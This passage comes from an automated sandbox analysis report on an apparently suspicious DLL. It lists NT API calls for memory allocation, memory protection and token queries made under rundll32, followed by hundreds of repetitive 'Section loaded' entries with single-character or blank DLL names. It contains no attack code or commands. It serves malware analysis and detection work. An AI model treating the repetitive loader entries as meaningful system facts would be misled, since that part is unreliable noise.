                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_052D83B7 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,29_2_052D83B7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_052DB341 NtQueryVirtualMemory,29_2_052DB341
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_001E009C NtAllocateVirtualMemory,33_2_001E009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_001E0066 NtAllocateVirtualMemory,33_2_001E0066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_001E0285 NtProtectVirtualMemory,33_2_001E0285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 35_2_030E0066 NtAllocateVirtualMemory,35_2_030E0066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 35_2_030E0285 NtProtectVirtualMemory,35_2_030E0285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 35_2_030E009C NtAllocateVirtualMemory,35_2_030E009C
                      Source: qT9Qk5aKTk.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: qT9Qk5aKTk.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: @ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ? .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: > .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: = .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: < .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ; .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: : .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 9 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 8 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 7 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 6 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 5 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 4 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 3 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 2 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 1 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 0 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: - .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: , .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: + .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: * .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ) .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ( .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: & .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: % .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: $ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: # .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ! .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ~ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: } .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: | .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: { .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ` .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: _ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ^ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ] .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: [ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: @ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ? .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: > .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: = .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: < .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ; .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: : .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 9 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 8 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 7 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 6 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 5 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 4 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 3 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 2 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 1 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 0 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: - .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: , .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: + .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: * .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ) .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ( .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: & .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: % .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: $ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: # .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ! .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
